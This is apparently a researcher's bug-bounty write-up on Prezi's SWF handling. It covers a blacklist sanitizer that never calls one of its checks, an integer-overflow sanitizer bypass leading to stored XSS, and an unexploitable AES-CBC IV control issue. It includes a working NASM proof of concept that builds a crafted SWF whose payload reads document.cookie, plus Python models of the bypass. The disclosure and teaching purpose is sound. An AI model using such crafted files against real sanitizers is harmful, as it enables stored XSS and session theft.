Some time ago I decided to spend a few evenings playing with bug bounties. I looked around and finally decided to focus on Prezi, since, being a user of their product, I was already somewhat familiar with it. As I seem to be naturally drawn to low-level areas, this quickly turned into an ActionScript reverse-engineering exercise that involved digging into the internals of the SWF file format. I found a couple of interesting and fun bugs (e.g. an integer overflow that led to ActionScript code execution - you don't commonly see these this far from the C/C++ kingdom), and a few of them are worth sharing in my opinion.

At the bottom of the post I've put some information about the tools I've used, just in case you're curious.

Random announcement not really having anything to do with the post: Dragon Sector is looking for sponsors that would help us play at DEF CON CTF. Thank you. Now back to our show!

What is Prezi?

Before I get to the juicy part, let's do a really quick intro to give everyone some context: Prezi (prezi.com) is basically a huge Flash application that allows you to make cool-looking animated presentations in a really easy way. They provide both an online service with storage and a desktop version, which is just a standalone Flash application; I focused only on the online application and the surrounding web service.

As far as the Prezi Bug Bounty Program goes, you can read all about it at http://prezi.com/bugbounty/. I'll just add that everything (communication, fixing bugs, etc.) went smoothly and that Prezi has a really friendly security team :)

Bug 1: SWF sanitization incomplete blacklist into AS code execution (XSS)

One of Prezi's features is embedding user-provided Flash applets into the presentation. Of course, before the SWF is embedded, it's scrubbed of any parts that contain ActionScript or import other SWF files - this is done to prevent the user's (attacker's) code from executing. As soon as the SWF is clean, it gets loaded into Prezi's context.

The SWF (under the optional DEFLATE compression layer) is basically a chunk-based format. Each chunk starts with a header, followed by the chunk's data; the header looks like this:

Short chunk: [ data size (6 bits) ][ tag ID (10 bits) ]
Long chunk:  [         0x3f       ][ tag ID (10 bits) ][ data size (32 bits) ]
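
To make the layout concrete, here is a minimal Python sketch of decoding such a header. It assumes the 16-bit field is stored little-endian, with the tag ID in the upper 10 bits and the size in the lower 6, and it treats the long size as unsigned (matching the uint the sanitizer works with later on). The function name read_tag_header is made up for this example.

```python
import struct

def read_tag_header(data, pos=0):
    """Return (tag_id, data_size, header_size) for the chunk header at data[pos:]."""
    (word,) = struct.unpack_from("<H", data, pos)
    tag_id = word >> 6        # upper 10 bits
    size = word & 0x3F        # lower 6 bits
    if size == 0x3F:          # long chunk: the real size follows as 32 bits
        (size,) = struct.unpack_from("<I", data, pos + 2)
        return tag_id, size, 6
    return tag_id, size, 2

# A short SetBackgroundColor (ID 9) chunk carrying 3 bytes of data.
short_chunk = struct.pack("<H", (9 << 6) | 3) + b"\xff\x00\x00"
# A long DoAction (ID 12) header announcing 100 bytes of data.
long_header = struct.pack("<HI", (12 << 6) | 0x3F, 100)

print(read_tag_header(short_chunk))  # (9, 3, 2)
print(read_tag_header(long_header))  # (12, 100, 6)
```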

Both the formats of the chunks and the tag IDs are defined in the "SWF File Format Specification" released by Adobe. As of today the current version is 19, updated April 23, 2013, and as is to be expected, it has "only" 243 pages. The defined tag IDs currently span 0 to 93, with a few values unassigned (e.g. ID 92 or IDs 79-81), and some of them are just iterations of a given chunk type (e.g. ID 2 - DefineShape, ID 22 - DefineShape2, ID 32 - DefineShape3 and ID 83 - DefineShape4).

As mentioned, the scrubbing went after the chunks which might lead to code execution - if such a chunk was found, it was removed from the SWF.

There are basically three groups of chunks that may result in code execution:
  1. Chunks which just execute code, e.g. ID 59 - DoInitAction or ID 12 - DoAction.
  2. Chunks which import resources (chunks) from other SWF files, e.g. ID 57 - ImportAssets or the second version of this chunk with ID 71.
  3. Chunks representing graphical objects which may have some actions defined - e.g. ID 7 DefineButton, which can perform actions (i.e. run ActionScript) when e.g. it's clicked.
As one can imagine, Prezi did contain three functions responsible for recognizing these groups:

private static function isTagTypeCode(param1:uint) : Boolean
{
 return param1 == 12 || param1 == 59 || param1 == 76 || param1 == 82;
}// end function

private static function isTagTypeImports(param1:uint) : Boolean
{
 return param1 == 57 || param1 == 71;
}// end function

private static function isTagTypeContainsActions(param1:uint) : Boolean
{
 return param1 == 7 || param1 == 26 || param1 == 34 || param1 == 39 || param1 == 70;
}// end function

Here's the catch: isTagTypeContainsActions was never called. So embedding a Flash file with e.g. a button that had actions defined (e.g. the "on mouse over" action) led to arbitrary ActionScript code execution in the context of Prezi, which is basically an XSS (and a stored/wormable one at that).
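
The effect can be sketched in a few lines of Python. The three predicates mirror the decompiled functions above; how the sanitizer actually combined them isn't shown here, so flagged_before_fix is only an assumed shape of the buggy check (the first two predicates OR-ed together), and both flagged_* names are made up for this example.

```python
def is_tag_type_code(tag_id):
    return tag_id in (12, 59, 76, 82)

def is_tag_type_imports(tag_id):
    return tag_id in (57, 71)

def is_tag_type_contains_actions(tag_id):
    return tag_id in (7, 26, 34, 39, 70)

def flagged_before_fix(tag_id):
    # Assumption: only the first two predicates were ever consulted.
    return is_tag_type_code(tag_id) or is_tag_type_imports(tag_id)

def flagged_with_all_checks(tag_id):
    return flagged_before_fix(tag_id) or is_tag_type_contains_actions(tag_id)

DEFINE_BUTTON = 7
print(flagged_before_fix(DEFINE_BUTTON))       # False: the button and its actions get through
print(flagged_with_all_checks(DEFINE_BUTTON))  # True
```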



The tricky part with the fix here is that ideally you don't want to remove graphical elements from the SWF, so removing whole chunks in this case is overkill. What you want to do is remove the actions alone, and that requires more code and digging deeper into the format, which turns the simple solution into a more complex one.

On a more general note: using a blacklist is usually a bad idea; for example, a new SWF File Format Specification comes out with Tag ID 95 defined as DoInitAction2 and you have to update the application. You miss a beat and you have an XSS again. A cleaner solution here would be to have a whitelist of allowed tags and just remove everything else.
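
A whitelist filter could look roughly like the Python sketch below. This is only an illustration, not Prezi's fix: the ALLOWED_TAGS set is a hypothetical, deliberately tiny selection (End, ShowFrame, SetBackgroundColor and the DefineShape family), and the helper names are made up. Note that it also rejects chunks that claim to run past the end of the data.

```python
import struct

# Hypothetical allow-list: End, ShowFrame, DefineShape, SetBackgroundColor,
# DefineShape2, DefineShape3, DefineShape4.
ALLOWED_TAGS = {0, 1, 2, 9, 22, 32, 83}

def split_tags(body):
    """Yield (tag_id, raw_chunk_bytes) for every chunk in a tag stream."""
    pos = 0
    while pos < len(body):
        if pos + 2 > len(body):
            raise ValueError("truncated chunk header")
        (word,) = struct.unpack_from("<H", body, pos)
        tag_id, length, header = word >> 6, word & 0x3F, 2
        if length == 0x3F:
            if pos + 6 > len(body):
                raise ValueError("truncated long chunk header")
            (length,) = struct.unpack_from("<I", body, pos + 2)
            header = 6
        end = pos + header + length   # Python ints don't wrap around
        if end > len(body):
            raise ValueError("chunk runs past the end of the data")
        yield tag_id, body[pos:end]
        pos = end

def keep_allowed(body):
    """Drop every chunk whose tag ID is not explicitly allowed."""
    return b"".join(raw for tag_id, raw in split_tags(body) if tag_id in ALLOWED_TAGS)

def short_tag(tag_id, data=b""):
    return struct.pack("<H", (tag_id << 6) | len(data)) + data

# ShowFrame, DoAction, an imaginary future tag 95, End.
body = short_tag(1) + short_tag(12, b"\x00") + short_tag(95, b"\x00") + short_tag(0)
cleaned = keep_allowed(body)
print([tag_id for tag_id, _ in split_tags(cleaned)])  # [1, 0]
```

The unknown tag 95 is dropped without anyone having to know what it does, which is the whole point of the whitelist.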

Bug 2: Integer overflow in AS into XSS

Digging deeper into the chunk-removing code I noticed the following:

private static function skipTag(param1:ByteArray) : void
{
 var _loc_2:* = getTagLengthAndSkipHeader(param1);
 param1.position = param1.position + _loc_2;
 return;
}// end function

The first statement, the call to getTagLengthAndSkipHeader, retrieves an attacker-controlled chunk length from the SWF file - as noted in the previous bug, for long chunks this can be a 32-bit value, and the returned type is uint.

The second statement, the assignment to param1.position, is an addition assignment that skips past the chunk-that-is-OK in the data stream. The param1.position is also uint according to AS documentation.

You know where this is going :)

In ActionScript uint is a 32-bit unsigned value with modulo arithmetic, so the result of the above addition is also truncated to 32-bit, regardless of its true value. So yes, it's an integer overflow. And it allowed one to bypass the SWF sanitizer.
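
Here is a tiny Python sketch of that wrap-around. Python integers never overflow, so the 32-bit truncation is emulated with a mask; the offsets 27 and 4 are purely illustrative and the function name is made up.

```python
MASK32 = 0xFFFFFFFF

def position_after_skip(position, tag_length):
    """Model `position = position + length` with both values held as 32-bit uint."""
    return (position + tag_length) & MASK32

# The attacker wants to end up 23 bytes *before* the current position, so
# the long chunk's size field holds -23 reinterpreted as an unsigned value.
length = -23 & MASK32
print(hex(length))                      # 0xffffffe9
print(position_after_skip(27, length))  # 4
```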

Exploiting this turned out to be quite interesting and included a small twist which made things even more entertaining.

Starting with the basic idea, here is how the sanitizer worked from a high-level perspective (in pseudocode; I'll omit the code added after patching the previous bug, since it changes nothing):

SWF = decompress(SWF)
SWF.position ← 0
SWF.headers.fileLength ← SWF.length
skip SWF headers
while SWF.bytesAvailable > 0 {
 if Tag at SWF.position is in blacklist {
   eraseTag()
   continue
 }
 skipTag()
}
 
The skipTag was already shown above, so that leaves just the eraseTag method:

old_position ← SWF.position
skipTag()
temp_buffer ← new ByteArray()
temp_buffer.writeBytes(SWF.readFromPositionToEOF())
SWF.position ← old_position
SWF.writeBytes(temp_buffer)
SWF.length ← old_position + temp_buffer.length
SWF.position ← old_position

So eraseTag basically copies whatever is past the tag-to-be-removed on top of that tag and fixes the total data size (SWF.length) afterwards.

The above allows us to jump backwards into the middle of a chunk (that's the consequence of the integer overflow) and remove however many bytes we like. This of course changes how the Adobe Flash SWF interpreter will see the file, which is different from how the sanitizer originally saw it.
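
The loop, skipTag and eraseTag can be modelled in Python to see the effect end to end. This is a simplified sketch, not Prezi's code: it works on a bare tag stream without the SWF headers, the blacklist holds only the IDs from the two predicates that were actually called, and the crafted layout (a decoy inside the first tag's data, a jump-back tag, padding, then the hidden tag) is my own illustrative construction.

```python
import struct

MASK32 = 0xFFFFFFFF
BLACKLIST = {12, 59, 76, 82, 57, 71}

def short_tag(tag_id, data=b""):
    return struct.pack("<H", (tag_id << 6) | len(data)) + data

def long_header(tag_id, length):
    return struct.pack("<HI", (tag_id << 6) | 0x3F, length & MASK32)

def read_header(buf, pos):
    """Return (tag_id, length, position just past the header)."""
    (word,) = struct.unpack_from("<H", buf, pos)
    tag_id, length, pos = word >> 6, word & 0x3F, pos + 2
    if length == 0x3F:
        (length,) = struct.unpack_from("<I", buf, pos)
        pos += 4
    return tag_id, length, pos

def skip_tag(buf, pos):
    _, length, pos = read_header(buf, pos)
    return (pos + length) & MASK32      # uint addition wraps around

def erase_tag(buf, pos):
    after = skip_tag(buf, pos)
    buf[pos:] = buf[after:]             # copy the tail over the tag, shrink the buffer
    return pos

def sanitize(data):
    buf, pos = bytearray(data), 0
    while pos < len(buf):
        tag_id, _, _ = read_header(buf, pos)
        pos = erase_tag(buf, pos) if tag_id in BLACKLIST else skip_tag(buf, pos)
    return bytes(buf)

def parser_view(data):
    """Tag IDs as seen by a parser that simply walks the chunks in order."""
    ids, pos = [], 0
    while pos < len(data):
        tag_id, length, pos = read_header(data, pos)
        ids.append(tag_id)
        pos += length
    return ids

evil = short_tag(12, b"\x00")                 # DoAction holding just an end-of-actions byte
decoy = short_tag(12, b"\xaa" * 10)           # blacklisted header hidden in tag data
to_eof = long_header(1, 0x7FFFFFFF)           # sends the sanitizer past the end
first = long_header(1, len(decoy) + len(to_eof)) + decoy + to_eof
jump_back = long_header(1, 6 - (len(first) + 6))   # wraps to offset 6, the decoy
padding = b"\xaa" * (len(decoy) - 6)          # erased bytes == jump_back header + padding
crafted = first + jump_back + padding + evil + short_tag(0)

print(parser_view(sanitize(short_tag(1) + evil + short_tag(0))))  # [1, 0]
print(parser_view(sanitize(crafted)))                             # [1, 12, 0]
```

In the plain file the DoAction tag is removed as intended; in the crafted one it survives, because the sanitizer is sent backwards, erases the decoy and is then sent past the end before it ever reaches the hidden tag.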

Let's look at an example:



So basically this is what's happening here (in chronological order):
  • The sanitizer reaches the overflowing tag and jumps backward into the first shown tag's data.
  • The data contains a valid chunk header, which describes a tag that is on the blacklist. This chunk gets removed.
  • The next tag (which originally was just the second chunk's data) has a huge length which sends the sanitizer to EOF, and so the sanitizer exits.
  • When the Adobe Flash SWF parser sees the output, it sees the "send to EOF" chunk, the overflowing chunk and the padding just as the first tag's data, and ignores it (ShowFrame has no meaningful data from the SWF parser's perspective).
  • And it reaches the hidden "evil" tags which contain ActionScript to execute. The sanitizer never had a chance to see and sanitize these tags, since it was sent backwards and then to EOF.
Now, here's the catch: Prezi's sanitizing code has a bug which triggers a quirky behavior in Adobe Flash, which prevents execution of any ActionScript.

Remember these lines?

SWF = decompress(SWF)
...
SWF.headers.fileLength ← SWF.length

This fixes the SWF length after decompression. However, the file length in the SWF headers should also be fixed if any chunk gets removed, and it's not. For some reason an incorrect size causes Flash to ignore any ActionScript (I never got to the bottom of why exactly this happens, though it acted very peculiarly).

So, to exploit this I needed to make the sanitizer fix the headers for me. This turned out to be both simple and a little more tricky. Simple, because the overflow allowed me to send the sanitizer back as far as I wanted - e.g. to the beginning of the SWF headers. And more tricky, because the DWORD representing the file size is just after the SWF magic and version, so that means I had to make the file size be at the same time a valid chunk header for a blacklisted chunk (but that turned out to not be a problem).
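
To see why that wasn't a problem, here is a short Python sketch that reads a file size the way the sanitizer would read a chunk header. It assumes the little-endian layout described earlier, so only the low 16 bits of the DWORD form the header and the upper two bytes simply become chunk data. The values 830 and 766 are the two file sizes that appear in the NASM listing further down; the function name is made up.

```python
def size_as_chunk_header(file_size):
    """Interpret the low 16 bits of a file-size DWORD as (tag_id, data_size)."""
    word = file_size & 0xFFFF
    return word >> 6, word & 0x3F

print(size_as_chunk_header(830))  # (12, 62): a blacklisted DoAction with 62 bytes of data
print(size_as_chunk_header(766))  # (11, 62): tag 11, not on the blacklist, so it gets skipped

# Erasing the first "chunk" removes its 2-byte header plus 62 bytes of data,
# which is exactly the difference between the two file sizes.
print(830 - (2 + 62))             # 766
```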

The final setup looked like this (in the data of the hidden chunks the sanitizer was sent to EOF of course):



The NASM code (it's the way I prefer to generate simple binary files - don't worry, it's "Ange Approved" ;>) to generate a PoC according to the above schema looks like this:

[bits 32]
org 0
start:

; SWF file

; ----------------------- HEADERS
db "FWS"
db 6      ; version 6

size_of_data_header:
dd end_of_file ; size of data

db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1     ; 1 Frame

; ----------------------- TAGS
%macro TAG_SHORT 2
 dw (%2 | %1 <<6)
%endmacro

%macro TAG_LONG 2
 %2:
 dw (0x3f | %1 << 6)
 dd .end - ($ + 4)
%endmacro

%macro TAG_LONG_MANUAL 2
 dw (0x3f | %1 << 6)
 dd %2
%endmacro

%define TAG_End 0
%define TAG_ShowFrame 1
%define TAG_DefineShape 2
%define TAG_SetBackgroundColor 9
%define TAG_PlaceObject2 26
%define TAG_DoAction 12

; Start of tags.

; Trigger the integer overflow to go back to the size of data field
TAG_LONG_MANUAL TAG_ShowFrame, -(($ - size_of_data_header) + 4)
times 41 db 0xaa

; Data continues here.
; Or actually it's the headers we need to rebuild.

dd 766 ; New file size. It's equal to tag 11, size 62
db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1     ; 1 Frame

; There are 47 bytes left here before that crazy thing returns.
; times 47 db 0xaa
TAG_LONG TAG_DoAction, MyAction1
 ; ACTIONSCRIPT v2
 db 0x83
 dw .StringsEnd1 - ($ + 2) ; Size
 db "javascript:prompt(document.domain,"
; Fun fact - in 4 bytes the crazy thing returns.
 db '"   '
; It's here. Well, send it back to the void or something.
 db 0x3f ; Long tag size. (it's actually '?')
 db ':'  ; Tag ID. Whatever.
 db '    ' ; 0x20202020 - this should be enough to get rid of it for good.
 db '" + '  ; And we're done here.
 ; Let's continue where we left off, shall we?
 db "document.cookie);", 0
 db "", 0 ; _blank
 .StringsEnd1:
 .ActionsEnd: db 0 ; EndOfAction Flag
.end:

TAG_SHORT TAG_ShowFrame, 0
TAG_LONG TAG_End, MyEnd

; End.
; 12 << 6 == 768
; + 0x3e == 830
times (((12 << 6) | 0x3e) - ($-start)) db 0xcc
.end:
end_of_file:

Of course ideally you wouldn't redirect the sanitizer into the middle of your AS/JS payload, but it's just a PoC, so no sense thinking too much about it I guess; especially since it worked:



Again, I would classify this as a stored/wormable XSS.

Bug 3 (unexploitable): Abusing the AES-128-CBC IV

Let's document some failures as well :)

This bug did exist (so it wasn't a false-positive), but it turned out to be non-exploitable due to how bloated the SWF headers are. Still, it's a pretty fun example of what you can attempt to do with crypto in certain, very specific, scenarios.

Let's start by discussing how Prezi is (was) loaded (I'll simplify it a little to focus on the important part):
  1. The website actually embeds a loader (called preziloader-*.swf).
  2. The loader fetches a 128-bit AES key and a 128-bit AES IV from /api/embed (yes, it's a relative path).
  3. The loader loads into a ByteArray the main module: main-*.swf from *.prezi.com (the domain is verified).
  4. The first 2064 bytes of the main SWF file are decrypted using AES-128-CBC, using the retrieved keys. The rest of the bytes are already plain-text.
  5. The main SWF is loaded into the same security context.
This means that:
  • We don't control main-*.swf at all.
  • But we do control both AES key and IV.
And, whoever controls the AES-128-CBC IV, fully controls the first 16 bytes of the decrypted main-*.swf.

This is because decryption in CBC mode works like this:
  1. Take the next 16-byte ciphertext block.
  2. Decrypt the block using the AES key and the AES algorithm.
  3. XOR the result with the 16-byte IV (for the first block) or with the previous ciphertext block (for every later block), and that's the decrypted block.
  4. GOTO 1 until end of data.
So:
  1. We know the result of the raw AES decryption of the first block (we can just grab main-*.swf and decrypt it using either their AES key or a different key that will give "wrong" data, that doesn't really matter).
  2. And we can choose what to XOR it with (IV).
So we choose the result of the decryption of the first block* (and, if we also swap the key, get trashed data in all the other blocks).
* - in textbook CBC the IV is XORed into the first block only; every later block is XORed with the preceding ciphertext block, which we don't control here.
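
The IV trick can be shown with a short Python sketch of textbook CBC decryption. To keep it dependency-free, the block cipher is replaced by a toy keyed function built from SHA-256: that is NOT AES and is only there so the example runs with the standard library; the XOR structure, which is what matters here, is the same for any block cipher. All names, the key and the sample data are made up.

```python
import hashlib

BLOCK = 16

def toy_block_decrypt(key, block):
    # Stand-in for the raw AES block decryption (assumption: NOT real AES).
    return hashlib.sha256(key + block).digest()[:BLOCK]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_decrypt(key, iv, ciphertext):
    out, prev = bytearray(), iv
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out += xor(toy_block_decrypt(key, block), prev)
        prev = block                   # later blocks use the previous ciphertext block
    return bytes(out)

def forge_iv(key, first_cipher_block, wanted_plaintext):
    """Pick the IV that makes the first decrypted block equal wanted_plaintext."""
    return xor(toy_block_decrypt(key, first_cipher_block), wanted_plaintext)

ciphertext = bytes(range(48))          # three blocks we cannot modify
key = b"attacker-chosen!"              # any key works for the first block
wanted = b"FWS\x06" + b"A" * 12        # 16 bytes of our choice

iv = forge_iv(key, ciphertext[:BLOCK], wanted)
plain = cbc_decrypt(key, iv, ciphertext)
print(plain[:BLOCK] == wanted)         # True

# With the same key, changing the IV leaves every block after the first untouched.
print(plain[BLOCK:] == cbc_decrypt(key, bytes(BLOCK), ciphertext)[BLOCK:])  # True
```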

There are a couple of important things to note:
  • The IV gives us only 16 bytes to control.
  • With some AES key brute-forcing it might be possible to control an additional 2-5 bytes - however the time to get the additional bytes grows exponentially - it's basically 256**N operations (AES decryptions), where N is the number of additional bytes we would like to control. This is also tricky for another reason (it will create additional constraints for byte values due to the IV changes we will have to make).
  • Prezi actually uses AES-128-CBC with PKCS#5, so padding bytes have to have the value of the padding length (e.g. a 5-byte padding has to look like this: 05 05 05 05 05). And remember: if we choose a different key/IV, the original padding will be destroyed. This can be bypassed by choosing the key/IV so that the last byte in the last block is 0x00 or 0x01 (then the padding is not checked because it's assumed that there is no padding at all, or it's a one-byte padding only). So this is not a huge problem.
  • If we choose the ZWS format for the SWF file, the Prezi loader is nice enough to fix the magic and file size in the SWF header, so that's 7 bytes we wouldn't have to worry about. But there is an additional LZMA header which we would have to start worrying about, so it gives us nothing.
  • Probably some of the bytes in the SWF header can have a broken value and the SWF will still work. So we don't have to worry about these bytes.
To sum up: we would control about 18-21 bytes, wouldn't have to worry about a few more and everything else would be "random bytes" (the result of decrypting data with wrong key and IV).
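
The padding point from the list above can be illustrated with a small Python model of a lenient PKCS#5 unpad routine. It follows the behaviour described there (a final byte of 0x00 means nothing is stripped or checked, 0x01 means only that single byte is looked at); whether the loader's routine matches this in every detail is an assumption, and the function name is made up.

```python
def unpad_lenient(data, block_size=16):
    """Strip PKCS#5-style padding; a trailing 0x00 is treated as 'no padding'."""
    if not data or len(data) % block_size:
        raise ValueError("length is not a multiple of the block size")
    n = data[-1]
    if n == 0:
        return data                    # nothing to strip, nothing to verify
    if n > len(data) or any(b != n for b in data[-n:]):
        raise ValueError("invalid padding")
    return data[:-n]

proper = bytes(11) + b"\x05" * 5                        # correct 5-byte padding
broken = bytes(11) + b"\x05\x05\x05\x04\x05"            # one padding byte is off
ends_in_01 = bytes(range(100, 115)) + b"\x01"           # arbitrary bytes, last one 0x01
ends_in_00 = bytes(range(100, 115)) + b"\x00"           # arbitrary bytes, last one 0x00

print(len(unpad_lenient(proper)))      # 11
print(len(unpad_lenient(ends_in_01)))  # 15
print(len(unpad_lenient(ends_in_00)))  # 16
try:
    unpad_lenient(broken)
except ValueError as exc:
    print(exc)                         # invalid padding
```

Under the assumption that a wrongly decrypted final block looks uniformly random, a little over 1 in 128 candidates end in 0x00 or 0x01 and therefore pass this check.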

Sadly/thankfully (depending on the perspective) in the end this is not exploitable with SWFs, because one would need to control about 50 bytes of SWF to make a valid file that has some meaningful code which gives you code execution. So... close, but no cigar :)

Tools used

In no particular order:
  • Sothink SWF Decompiler - Pretty fast and accurate tool. Had minor problems with a function or two, but that's still really good. You can re-compile the code it generates without any changes at all (very useful for testing).
  • JPEXS Free Flash Decompiler (aka FFDec) - A free and open-source SWF decompiler. Takes its time when decompiling, but sometimes does a better job than Sothink. It can also extract SWF files from a process's (think: browser's) memory - this proved useful. I didn't try to re-compile the code it generates.
  • Netwide Assembler (aka NASM) - An x86 assembler which I commonly misuse to assemble non-complex binary files.
  • Adobe Flex - Your basic ActionScript compiler.
  • Python - For additional scripts and mini-tools.
  • Firefox + Fiddler - HTTP communication monitoring.

And that's about it. Let me know if you have any questions or if I got something wrong.

Comments:

2014-03-27 13:55:02 = hdarwin
{
This post has given me a new perspective on hacking!

Thank you!
}
2014-03-27 16:43:29 = Peter Ferrie
{
When considering black- vs white-listing, the idea to remove anything not on the white-list has its own problem: if Adobe releases a new harmless-but-essential ID and someone uses it, then the Prezi version won't run until Prezi is updated. While that is much better from a security point of view, the user experience is terrible.
}
2014-03-27 18:15:56 = Attila Suszter
{
@Peter: In case of white-listing, it's reasonable to assume that adding a new ID is a major functional change. If Adobe releases beta version of major changes, that would allow some time for Prezi to update its code until the final version is released by Adobe.

In case of black-listing, it is good to audit Flash Player if it has undocumented ID that can execute action -- if it has not happened. It's known that it has undocumented byte codes, even I wrote about it.
}
2014-03-28 09:13:01 = WawaSeb
{
What a nice work.
Thanks...

Does somebody succeed re-compiling code generated by FFDec ?

}
2014-03-28 11:25:33 = am
{
can you elaborate a bit on the integer overflow part please?

Thanks!
}
2014-03-31 15:50:03 = Marc Ruef
{
Brilliant finding and great writeup!
}
